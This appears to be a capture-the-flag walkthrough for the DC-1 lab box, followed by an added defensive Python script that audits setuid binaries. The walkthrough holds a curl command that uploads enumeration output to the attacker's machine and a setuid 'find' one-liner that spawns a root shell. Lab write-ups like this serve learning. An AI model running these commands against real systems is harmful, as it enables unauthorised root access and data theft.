🐧DC-1

192.168.105.193

Enumeration

Nmap scan

nmap 192.168.105.193 -p- -sV -T4 -A

Port 22

No banner

Port 80

Found that Drupal 7 was the version installed.

Port 111

Port 52369

Shell

Used Metasploit to get a shell... I know, script kiddie.

Uploaded Linpeas and ran it. Then sent it back to my box to review.

curl -X POST http://192.168.49.105:8000/upload -F '[email protected]'

Linpeas found that find was stickied.

Using priv esc for find. Source: https://gtfobins.github.io/gtfobins/find/

find . -exec /bin/sh \; -quit

Root
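
A defender-side check for the finding above, as an added example that is not part of the original notes. It assumes "stickied" refers to the setuid bit that the GTFOBins entry relies on, and it walks a directory tree for setuid files, flagging those on a constructed watchlist; `audit_setuid` and `WATCHLIST` are hypothetical names.

```python
import os
import stat

# Constructed watchlist (assumption, not a copy of GTFOBins): general-purpose
# tools that can spawn commands or write files, so a setuid bit on them hands
# the file owner's privileges to any local user.
WATCHLIST = {"find", "vim", "env", "bash", "perl", "python", "cp"}


def audit_setuid(root):
    """Return sorted [(path, owner_uid, on_watchlist)] for setuid files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda err: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue  # file vanished or is unreadable; skip it
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_ISUID:
                continue
            base = name.rstrip("0123456789.")  # python3.9 -> python
            findings.append((path, st.st_uid, base in WATCHLIST))
    return sorted(findings)


if __name__ == "__main__":
    for path, uid, risky in audit_setuid("/usr"):
        tag = "REMOVE-SETUID?" if risky else "review"
        print(f"{tag:15} owner_uid={uid:<6} {path}")
```

A flagged binary owned by uid 0 is the condition this box was rooted through; `chmod u-s` on the file removes the bit.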
